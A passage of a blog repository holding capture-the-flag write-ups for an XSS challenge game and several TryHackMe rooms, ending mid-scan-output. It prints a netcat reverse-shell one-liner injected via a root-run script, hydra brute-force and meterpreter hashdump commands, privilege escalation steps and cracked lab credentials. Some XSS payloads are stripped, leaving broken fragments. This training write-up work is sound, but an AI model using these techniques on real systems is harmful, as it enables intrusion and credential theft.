pretty simple you just need to put some basic script tags with an alert() in it. 24 | 25 | ```javascript 26 |   27 | ``` 28 | 29 | ![](https://i.imgur.com/g1iQGRh.png) 30 | 31 | And there you go ! Your first challenge is done 👍 32 | 33 | # Level 2: Persistence is key 34 | 35 | ## Mission Description 36 | 37 | Web applications often keep user data in server-side and, increasingly, client-side databases and later display it to users. No matter where such user-controlled data comes from, it should be handled carefully. 38 | This level shows how easily XSS bugs can be introduced in complex apps. 39 | 40 | ## Mission Objective 41 | 42 | Inject a script to pop up an alert() in the context of the application. 43 | Note: the application saves your posts so if you sneak in code to execute the alert, this level will be solved every time you reload it 44 | 45 | ![](https://i.imgur.com/oIs0vI9.png) 46 | 47 | So, for this one you need to put some kind of alert in the comment section. 48 | 49 | Let's do that ! 🥳 50 | 51 | ```javascript 52 | "> 53 | ``` 54 | 55 | Well, this not javascript? isn’t it? 56 | At the first glance that’s true but let me explain this sorcery 👀 57 | 58 | Basically, this command escape from the attribute and from the tag (then you will be in the raw HTML) and create a new HTML tag to abuse 59 | 60 | ``` 61 | "> 88 | ``` 89 | 90 | This command escape the following HTML 91 | 92 | ```html 93 |
    Image 1
    94 | ``` 95 | 96 | If we add the command at the end il will escape the ```'1'``` 97 | 98 | With : 99 | ``` 100 | '1''> 101 | ``` 102 | and the alert will show up ! 🥳 103 | 104 | ![](https://i.imgur.com/ujbTkDu.png) 105 | 106 | # Level 4: Context matters 107 | 108 | ## Mission Description 109 | 110 | Every bit of user-supplied data must be correctly escaped for the context of the page in which it will appear. This level shows why. 111 | 112 | ## Mission Objective 113 | 114 | Inject a script to pop up a JavaScript alert() in the application. 115 | 116 | ![](https://i.imgur.com/xUGG7Uz.png) 117 | 118 | This one is a little bit tricky let me explain step by step 119 | 120 | First, we can try to break the onload function with a simple quote exemple 121 | 122 | ![](https://i.imgur.com/swwONYS.png) 123 | 124 | As you can see on the javascript console, we create our first error ( that's great don't worry 🥴 ) 125 | 126 | Now that we create the error, what we gonna do now ? 127 | 128 | Let's have a look at the source code here : 129 | ```html 130 | 131 | ``` 132 | https://xss-game.appspot.com/level4/frame?timer=3 133 | 134 | Like the challenges before we can escape the startTime funtion with our own funtion let's try that ! 135 | 136 | ```javascript 137 | 3') || alert (' 138 | ``` 139 | You can found alot of xss payload on differents website 140 | 141 | ```text 142 | https://github.com/LasCC/Hack-Tools 143 | https://owasp.org/www-community/xss-filter-evasion-cheatsheet 144 | https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html 145 | https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 146 | https://gist.github.com/kurobeats/9a613c9ab68914312cbb415134795b45 147 | https://edu.heibai.org/XSS-Cheat-Sheet-2019-Edition-2.pdf 148 | ``` 149 | 150 | ![](https://i.imgur.com/4fmxxQ7.png) 151 | 152 | -------------------------------------------------------------------------------- /src/content/blog/blueprint.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Blueprint - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-05-28 5 | description: "Writeup for the Blueprint on TryHackMe" 6 | --- 7 | [TryHackMe | Blueprint](https://tryhackme.com/room/blueprint) 8 | 9 | ![](https://webstockreview.net/images/win) 10 | 11 | Do you have what is takes to hack into this Windows Machine? 12 | 13 | `It might take around 3-4 minutes for the machine to boot.` 14 | 15 | ### Setup 16 | 17 | ``` 18 | ➜ TryHackMe nmap -A -vv 10.10.80.61 19 | ``` 20 | 21 | ``` 22 | PORT STATE SERVICE REASON VERSION 23 | 135/tcp open msrpc syn-ack Microsoft Windows RPC 24 | 25 | 139/tcp open netbios-ssn syn-ack Windows 7 Home Basic 7601 Service Pack 1 netbios-ssn 26 | 27 | 443/tcp open ssl/http syn-ack Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28) 28 | | http-methods: 29 | |_ Supported Methods: GET HEAD POST OPTIONS 30 | |_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28 31 | |_http-title: Bad request! 32 | | ssl-cert: Subject: commonName=localhost 33 | | Issuer: commonName=localhost 34 | | Public Key type: rsa 35 | | Public Key bits: 1024 36 | | Signature Algorithm: sha1WithRSAEncryption 37 | | Not valid before: 2009-11-10T23:48:47 38 | | Not valid after: 2019-11-08T23:48:47 39 | | MD5: a0a4 4cc9 9e84 b26f 9e63 9f9e d229 dee0 40 | | SHA-1: b023 8c54 7a90 5bfa 119c 4e8b acca eacf 3649 1ff6 41 | | -----BEGIN CERTIFICATE----- 42 | | MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls 43 | | b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD 44 | | VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj 45 | | 7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o 46 | | J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT 47 | | gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD 48 | | gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd 49 | | aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL 50 | | vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE= 51 | |_-----END CERTIFICATE----- 52 | |_ssl-date: TLS randomness does not represent time 53 | | tls-alpn: 54 | |_ http/1.1 55 | 56 | 3306/tcp open mysql syn-ack MariaDB (unauthorized) 57 | 58 | 8080/tcp open http syn-ack Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28) 59 | | http-methods: 60 | | Supported Methods: GET HEAD POST OPTIONS TRACE 61 | |_ Potentially risky methods: TRACE 62 | |_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28 63 | |_http-title: Index of / 64 | 49152/tcp open msrpc syn-ack Microsoft Windows RPC 65 | 49153/tcp open msrpc syn-ack Microsoft Windows RPC 66 | 49154/tcp open msrpc syn-ack Microsoft Windows RPC 67 | 49158/tcp open msrpc syn-ack Microsoft Windows RPC 68 | Service Info: Hosts: www.example.com, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows 69 | 70 | Host script results: 71 | |_clock-skew: mean: -19m59s, deviation: 34m37s, median: 0s 72 | | nbstat: NetBIOS name: BLUEPRINT, NetBIOS user: , NetBIOS MAC: 02:05:ad:f5:e5:be (unknown) 73 | | Names: 74 | | BLUEPRINT<00> Flags: 75 | | WORKGROUP<00> Flags: 76 | | BLUEPRINT<20> Flags: 77 | | WORKGROUP<1e> Flags: 78 | | WORKGROUP<1d> Flags: 79 | | \x01\x02__MSBROWSE__\x02<01> Flags: 80 | | Statistics: 81 | | 02 05 ad f5 e5 be 00 00 00 00 00 00 00 00 00 00 00 82 | | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 83 | |_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 | | p2p-conficker: 85 | | Checking for Conficker.C or higher... 86 | | Check 1 (port 41714/tcp): CLEAN (Couldnt connect) 87 | | Check 2 (port 54382/tcp): CLEAN (Couldnt connect) 88 | | Check 3 (port 22612/udp): CLEAN (Failed to receive data) 89 | | Check 4 (port 23038/udp): CLEAN (Timeout) 90 | |_ 0/4 checks are positive: Host is CLEAN or ports are blocked 91 | | smb-os-discovery: 92 | | OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1) 93 | | OS CPE: cpe:/o:microsoft:windows_7::sp1 94 | | Computer name: BLUEPRINT 95 | | NetBIOS computer name: BLUEPRINT\x00 96 | | Workgroup: WORKGROUP\x00 97 | |_ System time: 2020-05-28T19:03:48+01:00 98 | | smb-security-mode: 99 | | account_used: guest 100 | | authentication_level: user 101 | | challenge_response: supported 102 | |_ message_signing: disabled (dangerous, but default) 103 | | smb2-security-mode: 104 | | 2.02: 105 | |_ Message signing enabled but not required 106 | | smb2-time: 107 | | date: 2020-05-28T18:03:50 108 | |_ start_date: 2020-05-28T18:03:02 109 | ``` 110 | 111 | ![](https://imgur.com/rUJpFMM.png) 112 | 113 | [osCommerce 2.3.4.1 - Remote Code Execution by DanielRTeixeira · Pull Request #9821 · rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework/pull/9821/files/b5681cb954bed6a1e64cf6708cbd5a937e596f5b) 114 | 115 | ![](https://imgur.com/nrRw0SU.png) 116 | 117 | ![](https://imgur.com/lecapcm.png) 118 | 119 | ### #1 "Lab" user NTML hash decrypted 120 | 121 | ``` 122 | meterpreter > run hashdump 123 | ``` 124 | 125 | ![](https://imgur.com/J5xg1PX.png) 126 | 127 | ``` 128 | googleplus 129 | ``` 130 | 131 | ### #2 root.txt 132 | 133 | ``` 134 | meterpreter > shell 135 | C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\includes> whoami 136 | nt authority\system 137 | C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\includes> cd C:\User\Administrator\Desktop 138 | C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\includes> type root.txt.txt 139 | THM{aea1e3ce6fe7f89e10cea833ae009bee} 140 | ``` 141 | 142 | 143 | -------------------------------------------------------------------------------- /src/content/blog/break-out-of-the-cage.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Break Out The Cage - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-06-18 5 | description: "Writeup for the Break Out The Cage room on TryHackMe" 6 | --- 7 | [TryHackMe | Break Out The Cage](https://tryhackme.com/room/breakoutthecage1) 8 | Let's find out what his agent is up to.... 9 | 10 | --- 11 | 12 | ### Setup 13 | 14 | ``` 15 | ➜ TryHackMe nmap -A -vv 10.10.145.194 16 | ``` 17 | 18 | ``` 19 | 21/tcp open ftp syn-ack vsftpd 3.0.3 20 | | ftp-anon: Anonymous FTP login allowed (FTP code 230) 21 | |_-rw-r--r-- 1 0 0 396 May 25 23:33 dad_tasks 22 | | ftp-syst: 23 | | STAT: 24 | | FTP server status: 25 | | Connected to ::ffff:10.9.2.228 26 | | Logged in as ftp 27 | | TYPE: ASCII 28 | | No session bandwidth limit 29 | | Session timeout in seconds is 300 30 | | Control connection is plain text 31 | | Data connections will be plain text 32 | | At session startup, client count was 3 33 | | vsFTPd 3.0.3 - secure, fast, stable 34 | |_End of status 35 | 36 | 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 37 | | ssh-hostkey: 38 | | 2048 dd:fd:88:94:f8:c8:d1:1b:51:e3:7d:f8:1d:dd:82:3e (RSA) 39 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDn+KLEDP81/6ceCvdFeDrLFYWSWc6UnOmmpiNeXuyr+GRvE5Eff4DOeTbiEIcHQkkPcz2QXiOLd9SMjCEgAqmZiZE/mv1HJpQfmRLOufOlf9oZ1TIZf7ehKcVqX0W3nuQeC+M2wLBse2lGhovnTSaZKLKRjQCP2yD1EzND/xFA88oFpahvr6vJfyGOTADjc83AJq9n3Gnil4Nd88xNsIKTl01Mm9ikE/3n/XFbwzYa2bYJRVr+lWWRd+EU3sYTY80PQgBiw6ZPT0QCe0lQfmcgCqu4hC+t/kyfmMRlbtjN/yZJ0gCWeVVAV+A4NNgsOqFbXUT+c6ATzYNhBXRojJED 40 | | 256 3e:ba:38:63:2b:8d:1c:68:13:d5:05:ba:7a:ae:d9:3b (ECDSA) 41 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBA3G1rdbZBOf44Cvz2YGtC5WhIHfHQhtShY8miCVHayvHM/9reA8VvLx9jBOa+iClhm/HairgvNV6pYV6Jg6MII= 42 | | 256 c0:a6:a3:64:44:1e:cf:47:5f:85:f6:1f:78:4c:59:d8 (ED25519) 43 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFiTPEbVpYmF2d/NDdhVYlXWA5PmTHhtrtlAaTiEuZOj 44 | 45 | 80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu)) 46 | | http-methods: 47 | |_ Supported Methods: POST OPTIONS HEAD GET 48 | |_http-server-header: Apache/2.4.29 (Ubuntu) 49 | |_http-title: Nicholas Cage Stories 50 | Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel 51 | ``` 52 | 53 | ``` 54 | ➜ TryHackMe dirb http://10.10.145.194/ -R 55 | 56 | ----------------- 57 | DIRB v2.22 58 | By The Dark Raver 59 | ----------------- 60 | 61 | START_TIME: Mon Jun 15 10:10:41 2020 62 | URL_BASE: http://10.10.145.194/ 63 | WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt 64 | OPTION: Interactive Recursion 65 | 66 | ----------------- 67 | 68 | GENERATED WORDS: 4612 69 | 70 | ---- Scanning URL: http://10.10.145.194/ ---- 71 | ==> DIRECTORY: http://10.10.145.194/contracts/ 72 | ==> DIRECTORY: http://10.10.145.194/html/ 73 | ==> DIRECTORY: http://10.10.145.194/images/ 74 | ==> DIRECTORY: http://10.10.145.194/auditions/ 75 | + http://10.10.145.194/index.html (CODE:200|SIZE:2453) 76 | ==> DIRECTORY: http://10.10.145.194/scripts/ 77 | + http://10.10.145.194/server-status (CODE:403|SIZE:278) 78 | ``` 79 | 80 | ![](https://imgur.com/OszNOAo.png) 81 | 82 | As you can see by the title of the file, this mp3 is corrupted let's see if there is something hidden using stenography. 83 | 84 | ![](https://imgur.com/1VoGSx0.png) 85 | 86 | Yep ! There is something hidden in this file the "password" is : namelesstwo 87 | 88 | ![](https://imgur.com/gN4KqtG.png) 89 | ![](https://imgur.com/eVBHL57.png) 90 | 91 | [Vigenère Cipher - Decoder, Encoder, Solver, Translator](https://www.dcode.fr/vigenere-cipher) 92 | 93 | ``` 94 | Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!! 95 | One. Revamp the website 96 | Two. Put more quotes in script 97 | Three. Buy bee pesticide 98 | Four. Help him with acting lessons 99 | Five. Teach Dad what "information security" is. 100 | 101 | In case I forget.... Mydadisghostrideraintthatcoolnocausehesonfirejokes 102 | ``` 103 | 104 | ### #1 What is Weston's password? 105 | 106 | ``` 107 | Mydadisghostrideraintthatcoolnocausehesonfirejokes 108 | ``` 109 | 110 | ### #2 What's the user flag? 111 | 112 | I tried to use the find command to locate all the txt files but nothing came out.. 113 | 114 | ``` 115 | weston@national-treasure:~$ find / -type f -name "user.*" 2>/dev/null 116 | ``` 117 | 118 | Let's try something else .. 😢 119 | 120 | ![](https://imgur.com/B1Bb9kI.png) 121 | 122 | As you can see there this script that we can execute with root permission let's get a reverse shell 🤤 123 | 124 | Wait ... 125 | 126 | ![](https://imgur.com/fe66YHv.png) 127 | 128 | When I was editing the script I noticed something interesting there is a script that write random quotes, let's find the script 🤨 129 | 130 | You can also find the random quotes in the motd 131 | 132 | ![](https://imgur.com/iQWwMqZ.png) 133 | 134 | ``` 135 | weston@national-treasure:~$ find / -type f -name "rando*" 2>/dev/null 136 | ``` 137 | 138 | Nothing there.. 😟 139 | 140 | ``` 141 | weston@national-treasure:~$ find / -type f -name "*quotes*" 2>/dev/null 142 | ``` 143 | 144 | AH ! I found it! 😅 145 | 146 | ![](https://imgur.com/tUotgtl.png) 147 | 148 | ```python 149 | weston@national-treasure:~$ cat /opt/.dads_scripts/spread_the_quotes.py 150 | #!/usr/bin/env python 151 | 152 | #Copyright Weston 2k20 (Dad couldnt write this with all the time in the world!) 153 | import os 154 | import random 155 | 156 | lines = open("/opt/.dads_scripts/.files/.quotes").read().splitlines() 157 | quote = random.choice(lines) 158 | os.system("wall " + quote) 159 | ``` 160 | 161 | Let's get a reverse shell 162 | 163 | ``` 164 | rm -f /tmp/rev 165 | cat << EOF > /tmp/rev 166 | #!/bin/bash 167 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.9.2.228 4444 >/tmp/f 168 | EOF 169 | chmod +x /tmp/rev 170 | printf 'bop; /tmp/rev\n' > /opt/.dads_scripts/.files/.quotes 171 | ``` 172 | 173 | Wait maybe 1 or two minutes to get a shell 174 | 175 | ![](https://imgur.com/WBwzInV.png) 176 | 177 | ``` 178 | ls 179 | email_backup 180 | Super_Duper_Checklist 181 | cd Super* 182 | /bin/bash: line 30: cd: Super_Duper_Checklist: Not a directory 183 | cat Super* 184 | 1 - Increase acting lesson budget by at least 30% 185 | 2 - Get Weston to stop wearing eye-liner 186 | 3 - Get a new pet octopus 187 | 4 - Try and keep current wife 188 | 5 - Figure out why Weston has this etched into his desk: THM{M37AL_0R_P3N_T35T1NG} 189 | ``` 190 | 191 | ### #3 What's the root flag? 192 | 193 | Once you are in the cage account go to this repertory 194 | 195 | ``` 196 | /home/cage/email_backup 197 | ``` 198 | 199 | And cat \* 200 | 201 | ![](https://imgur.com/oi1cWOc.png) 202 | 203 | After a while I figured out that the "password" highlighted is encoded using Vigenère encryption 204 | 205 | But as you can see you need to provide some key to decode the password I tried "Face" because on the last paragraph the email repeat many times the word so i guess i had some chance 🥴 206 | 207 | ![](https://imgur.com/junuXVj.png) 208 | 209 | [CyberChef]() 210 | 211 | ``` 212 | cageisnotalegend 213 | ``` 214 | 215 | You can also stabilized the shell using the cage's ssh key 216 | 217 | ![](https://imgur.com/uWyHix4.png) 218 | 219 | Once you stabilized the shell you can just type "su" and type the password that we discover earlier 220 | 221 | ![](https://imgur.com/ibMOroe.png) 222 | 223 | ``` 224 | THM{8R1NG_D0WN_7H3_C493_L0N9_L1V3_M3} 225 | ``` 226 | 227 | 228 | -------------------------------------------------------------------------------- /src/content/blog/brute-it.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Brute IT - TryHackMe" 3 | category: "THM" 4 | pubDate: 2021-01-27 5 | description: "Learn how to brute, hash cracking and escalate privileges in this box!" 6 | --- 7 | [TryHackMe | Brute IT](https://tryhackme.com/room/bruteit) 8 | 9 | In this box you will learn about: 10 | 11 | - Brute-force 12 | - Hash cracking 13 | - Privilege escalation 14 | 15 | --- 16 | 17 | ## Before attacking, let's get information about the target 18 | 19 | ### Search for open ports using nmap, how many ports are open? 20 | 21 | ``` 22 | Desktop/TryHackMe/brut_it » nmap -A -vv 10.10.93.226 -oN nmap_result 23 | ``` 24 | 25 | ![](../images/bruteit/Untitled.png) 26 | 27 | ``` 28 | 2 ports are open. 29 | ``` 30 | 31 | ### What version of SSH is running? 32 | 33 | ``` 34 | OpenSSH 7.6p1 35 | ``` 36 | 37 | ![](../images/bruteit/Untitled1.png) 38 | 39 | ### What version of Apache is running? 40 | 41 | ``` 42 | 2.4.29 43 | ``` 44 | 45 | ![](../images/bruteit/Untitled2.png) 46 | 47 | ### Which Linux distribution is running? 48 | 49 | ``` 50 | ubuntu 51 | ``` 52 | 53 | ![](../images/bruteit/Untitled3.png) 54 | 55 | ### Search for hidden directories on web server, what is the hidden directory? 56 | 57 | ``` 58 | Desktop/TryHackMe/brut_it » gobuster -u 10.10.93.226 -w /opt/directory-list-2.3-medium.txt 59 | ``` 60 | 61 | ![](../images/bruteit/Untitled4.png) 62 | 63 | ``` 64 | # Hidden directory 65 | /admin 66 | ``` 67 | 68 | --- 69 | 70 | ## Find a form to get a shell on SSH. 71 | 72 | ### What is the user:password of the admin panel? 73 | 74 | ![](../images/bruteit/Untitled5.png) 75 | 76 | As you can see, there is the user and password in the form data, we can use this to brute-force the login with hydra. 77 | 78 | Hidden message 79 | 80 | ![](../images/bruteit/Untitled6.png) 81 | 82 | ``` 83 | # Hydra command (Pretty straightforward) 84 | hydra -l admin -P /opt/rockyou.txt 10.10.93.226 http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:Username or password invalid" 85 | ``` 86 | 87 | ![](../images/bruteit/Untitled7.png) 88 | 89 | ``` 90 | # Credentials 91 | admin:xavier 92 | ``` 93 | 94 | ### Crack the RSA key you found, what is John's RSA Private Key passphrase? 95 | 96 | ![](../images/bruteit/Untitled8.png) 97 | 98 | ``` 99 | # Password for the private key is 100 | rockinroll 101 | ``` 102 | 103 | ### user.txt 104 | 105 | ``` 106 | THM{a_password_is_not_a_barrier} 107 | ``` 108 | 109 | ![](../images/bruteit/Untitled9.png) 110 | 111 | ### Web flag 112 | 113 | ![](../images/bruteit/Untitled10.png) 114 | 115 | ``` 116 | THM{brut3_f0rce_is_e4sy} 117 | ``` 118 | 119 | --- 120 | 121 | ### Find a form to escalate your privileges, what is the root's password? 122 | 123 | ``` 124 | # Password for the root user 125 | football 126 | ``` 127 | 128 | ![](../images/bruteit/Untitled11.png) 129 | 130 | ### Root.txt 131 | 132 | ``` 133 | THM{pr1v1l3g3_3sc4l4t10n} 134 | ``` 135 | 136 | ![](../images/bruteit/Untitled12.png) 137 | 138 | -------------------------------------------------------------------------------- /src/content/blog/chocolate-factory.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Chocolate Factory - TryHackMe" 3 | category: "THM" 4 | pubDate: 2021-01-22 5 | description: "This room was designed so that hackers can revisit the Willy Wonka's Chocolate Factory and meet Oompa Loompa" 6 | --- 7 | [TryHackMe | Chocolate Factory](https://tryhackme.com/room/chocolatefactory) 8 | 9 | 10 | **Welcome to Willy Wonka's Chocolate Factory!** 11 | 12 | ![https://i.pinimg.com/originals/01/86/9e/01869e0b2238d8307020d2c4503cec51.jpg](https://i.pinimg.com/originals/01/86/9e/01869e0b2238d8307020d2c4503cec51.jpg) 13 | 14 | This room was designed so that hackers can revisit the Willy Wonka's Chocolate Factory and meet Oompa Loompa 15 | 16 | This is a beginner friendly room! 17 | 18 | If you have any issues / queries you can reach us through [Discord](https://discord.gg/AC2Enww) or [Twitter.](https://twitter.com/andyinfosec_?lang=en) 19 | 20 | ( Created by [AndyInfosec](https://andyinfosec.com/) team for the community! ) 21 | 22 | --- 23 | 24 | # Setup 25 | 26 | ``` 27 | TryHackMe/chocolate_factory » nmap -A --vv 10.10.239.0 28 | ``` 29 | 30 | ``` 31 | 21/tcp open ftp syn-ack vsftpd 3.0.3 32 | |_auth-owners: ERROR: Script execution failed (use -d to debug) 33 | | ftp-anon: Anonymous FTP login allowed (FTP code 230) 34 | |_-rw-rw-r-- 1 1000 1000 208838 Sep 30 14:31 gum_room.jpg 35 | | ftp-syst: 36 | | STAT: 37 | | FTP server status: 38 | | Connected to ::ffff:10.14.6.119 39 | | Logged in as ftp 40 | | TYPE: ASCII 41 | | No session bandwidth limit 42 | | Session timeout in seconds is 300 43 | | Control connection is plain text 44 | | Data connections will be plain text 45 | | At session startup, client count was 4 46 | | vsFTPd 3.0.3 - secure, fast, stable 47 | |_End of status 48 | 49 | 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 50 | |_auth-owners: ERROR: Script execution failed (use -d to debug) 51 | | ssh-hostkey: 52 | | 2048 16:31:bb:b5:1f:cc:cc:12:14:8f:f0:d8:33:b0:08:9b (RSA) 53 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuEAWoQHbW+vehIUZLTiJyXKjUAAJP0sgW/P0LHVaf4C5+1oEBXcDBBZC7SoL6MTMYn8zlEfhCbjQb7A/Yf2IxLzU5f35yuhEbWEvYmuP4PmBB04CJdDItU0xwAbGsufyzZ6td6LKm+oim8xJn/lVTeykVZTASF9iuY9tqwA933AfjqKlNByj82TAmlVkQ93bq+e7Gu/pRkSn++RkIUd4f8ogmLLusEh+vbGkZDj4UdwTIZbOSeuS4oz/umpkJPhekGVoyzjPMRIq9cwdeKIVRwUNbp4BoJjYKjbCC9YY8u/7O6lhtwo4uAp7Q9PfRRCiCpVimm6kIgBmgqqKbueDl 54 | | 256 e7:1f:c9:db:3e:aa:44:b6:72:10:3c:ee:db:1d:33:90 (ECDSA) 55 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAYfNs0w6oOdzMM4B2JyB5pWr1qq9oB+xF0Voyn4gBYEGPC9+dqPudYagioH1ArjIHZFF0G24rt7L/6x1OPJSts= 56 | | 256 b4:45:02:b6:24:8e:a9:06:5f:6c:79:44:8a:06:55:5e (ED25519) 57 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAwurtl1AFxJU7cHOfbCNr34YoTmAVnVUIXt4QHPD1B2 58 | 59 | 80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu)) 60 | |_auth-owners: ERROR: Script execution failed (use -d to debug) 61 | | http-methods: 62 | |_ Supported Methods: OPTIONS HEAD GET POST 63 | |_http-server-header: Apache/2.4.29 (Ubuntu) 64 | |_http-title: Site doesnt have a title (text/html). 65 | 100/tcp open newacct? syn-ack 66 | |_auth-owners: ERROR: Script execution failed (use -d to debug) 67 | | fingerprint-strings: 68 | | GenericLines, NULL: 69 | | Welcome to chocolate room!! 70 | | small hint from Mr.Wonka : Look somewhere else, its not here! ;) 71 | |_ hope you wont drown Augustus 72 | ``` 73 | 74 | Nice, we can see that there is a lot of ports open in that room, let's in the FTP with the anonymous login to see if there is something hidden in there 👀 75 | 76 | ![https://i.imgur.com/HmslKMI.png](https://i.imgur.com/HmslKMI.png) 77 | 78 | Well, as you can see there is a jpg file in the FTP server let's see if there is some kind of password in there. 79 | 80 | Well, I think this is a rabbit hole, let's continue with the website. 81 | 82 | ``` 83 | TryHackMe/chocolate_factory » gobuster -u http://10.10.239.0/ -w /opt/directory-list-2.3-medium.txt -x php 84 | ``` 85 | 86 | ``` 87 | Gobuster v1.3 OJ Reeves (@TheColonial) 88 | ===================================================== 89 | [+] Mode : dir 90 | [+] Url/Domain : http://10.10.239.0/ 91 | [+] Threads : 10 92 | [+] Wordlist : /opt/directory-list-2.3-medium.txt 93 | [+] Status codes : 302,307,200,204,301 94 | [+] Extensions : .php 95 | ===================================================== 96 | /home.php (Status: 200) 97 | ``` 98 | 99 | With the `-x php` we can tell at gobuster that we want only the .php extension and as you can see it worked! 100 | 101 | ![https://i.imgur.com/yNlNwIt.jpg](https://i.imgur.com/yNlNwIt.jpg) 102 | 103 | And of-course the only input contain an RCE 👍 104 | 105 | ![https://i.imgur.com/iiWEYxK.png](https://i.imgur.com/iiWEYxK.png) 106 | 107 | Let's create a reverse shell on the remote server. 108 | 109 | ![https://i.imgur.com/MMWbLfw.png](https://i.imgur.com/MMWbLfw.png) 110 | 111 | #AD this is actually my own chrome extension to generate reverse-shells and many more cool things 😎 112 | 113 | ![https://i.imgur.com/IQ2eaE3.png](https://i.imgur.com/IQ2eaE3.png) 114 | 115 | And voilà! we have a reverse shell 🙌 116 | 117 | # Enter the key you found! 118 | 119 | ``` 120 | b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY=' 121 | ``` 122 | 123 | ![https://i.imgur.com/FlUXUYi.png](https://i.imgur.com/FlUXUYi.png) 124 | 125 | # What is Charlie's password? 126 | 127 | ``` 128 | cn7824 129 | ``` 130 | 131 | ![https://i.imgur.com/3o4JOjA.png](https://i.imgur.com/3o4JOjA.png) 132 | 133 | # Enter the user flag 134 | 135 | Unfortunately with the basic reverse shell I cannot su to the Charlie's account so I looked on the `/home/charlie` folder and i found a private SSH key 136 | 137 | ![https://i.imgur.com/24wrKP2.png](https://i.imgur.com/24wrKP2.png) 138 | 139 | ![https://i.imgur.com/1eChcjq.png](https://i.imgur.com/1eChcjq.png) 140 | 141 | ![https://i.imgur.com/5qcdkLc.png](https://i.imgur.com/5qcdkLc.png) 142 | 143 | And there you go! We have the access to the Charlie's account! 144 | 145 | ``` 146 | chmod 600 [id_rsa] 147 | ssh -i id_rsa charlie@[ip] 148 | ``` 149 | 150 | ``` 151 | # Please reproduce the challenge its not that hard 👀 152 | flag{cd*********************d2e} 153 | ``` 154 | 155 | # Enter the root flag 156 | 157 | ![https://i.imgur.com/ce7yIjK.png](https://i.imgur.com/ce7yIjK.png) 158 | 159 | As you can see charlie can use sudo with VI let's see if there is a privesc in gtfobin 🥴 160 | 161 | ![https://i.imgur.com/ce7yIjK.png](https://i.imgur.com/ce7yIjK.png) 162 | 163 | ![https://i.imgur.com/VJLH9LZ.png](https://i.imgur.com/VJLH9LZ.png) 164 | 165 | ![https://i.imgur.com/P3FH1Dp.png](https://i.imgur.com/P3FH1Dp.png) 166 | 167 | ``` 168 | flag{cec*****************2124} 169 | ``` 170 | 171 | -------------------------------------------------------------------------------- /src/content/blog/daily-bugle.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Daily Bugle - TryHackMe" 3 | category: "THM" 4 | pubDate: 2021-01-28 5 | description: "Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate privileges." 6 | --- 7 | [TryHackMe | Daily Bugle](https://tryhackme.com/room/dailybugle) 8 | 9 | ![https://i.imgur.com/4xkRRJC.png](https://i.imgur.com/4xkRRJC.png) 10 | 11 | Deploy the machine - it may take up to 2 minutes to configure (Hard 🥴) 12 | 13 | --- 14 | 15 | ### Setup 16 | 17 | ``` 18 | Desktop/TryHackMe/daily_bugle » nmap -A -vv 10.10.85.30 -oN nmap_result 19 | ``` 20 | 21 | ``` 22 | 22/tcp open ssh syn-ack OpenSSH 7.4 (protocol 2.0) 23 | | ssh-hostkey: 24 | | 2048 